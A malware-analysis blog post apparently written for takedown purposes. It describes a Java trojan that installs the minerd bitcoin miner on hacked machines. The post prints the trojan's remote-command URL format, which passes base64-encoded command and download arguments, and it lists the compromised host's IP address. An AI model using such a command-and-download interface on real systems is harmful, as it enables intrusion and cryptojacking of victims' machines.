Saturday, January 9, 2016

MMD-0049-2016 - A case of java trojan (downloader/RCE) for remote minerd hack

Background

This is a short post for supporting the takedown purpose. Warning: Sorry, this time there's nothing fancy nor "in-depth analysis" :-) Yet the current hacking & infecting scheme is so bad, so I think it's best for all of us (fellow sysadmins in particular) to know this information for mitigation and hardening purpose.

In this case, a bad actor was using java coded malware injected to a "base infection" - a compromised windows machine (via usual remote windows service exploit hack method), to be used as a remote command execution (RCE) to the other hacked victim's machines, or, to be used as multiple-OS trojan downloader for attacking other machines. The trojan is supposed to be executed under java environment on the targeted machines, from a remote by URL with arguments as an API, to perform code execution or download functions.

In the current finding, this Java trojan is used to install the minerd into several targets. The Java trojan's download panel, the HFS web server, is installed on a hacked host in South Korea network by the suspected bad actor from PRC/China. (Yes, even it sounds like I'm pointing finger here, the threat source information is solid, do trace its bitcoin hash for PoC or the used tools).

The detection of the Java malware is always low, why we think the awareness of the threat is also important to raise its detection ratio (if possible).

The HFS panel

It was informed to our group by our friends (thank's to 김영욱) about the infection panel in here:

This panel is spotted in South Korea friend's network (victim) I hope this post can be used as reference for good people over there to delete the malware. The oss.war is the java trojan we described above.

In each directory it also spotted the minerd installer script:

..it was written in bash that is containing the information of the suspected actor.

Trojan downloader & remote command execution

It's a java coded malware as per seen in below:

It has arguments to be used during the remote access with URL format looks like below:

http://[BASE_INFECTION_PANEL]/oss.war?{cmd=base64]&winurl=[base64]&linurl=[base64]
Each argument is in base64 encoded:

These are the download function and remote execution function coded:

We believe it's coded in Java to support multiple operating system infection scheme, and even in this case it was set to download minerd installation bash script, the Java malware itself was generically designed in a way that can be used for many infection implementation..

As per written above, the detection ratio is low, but I never see high detection for any java coded applet or .jar since my first day hunting malware in web-->[link]

Malicious installation minerd

Bitcoin mining is okay, But hacking other's country machine for mining is bad. In this case is just worse than "bad" since the scheme is being used to hack multiple machines for bitcoin mining.

There are some directories with the extracted bitcoin installer already remotely used to infect victim's machine(s), and in each of the directory there's a one.tar file [link], which is actually a bash script to be remotely executed to install a minerd (a bit coin mining *NIX software). This remote execution can be done using Java malware remote execution function.

Well, I think the comments I wrote in the snippet picture above explained much of the badness and the link for the next investigation. Ah, yes, it's downloading the x86-64 ELF minerd.


Tips for IR team investigators: If the authority can access the base-infection machine, they can see the HFS web server log file (which is dumped also in memory that can be gained by forensics, just in case the bad actor deleting the log) to check which remote victim machines that were exploited for this malicious mining.

Epilogue & follow-up

Thank's for everyone involved in this matter. Please bare with this simple short post.
The usage java for this purpose is not nice & it's good to know.
I post the sample in kernelmode [link].
Thank's in advance for the S.Korea friends for the cleanup, below is more info of the network:

  "ip": "202.68.226.59",
  "region": "Seoul",
  "country": "KR",
  "loc": "37.5985,126.9783",
  "org": "AS38086 IP4 Networks,Inc.(cwsys.net)"
  "prefix": "202.68.224.0/20"

#MalwareMustDie!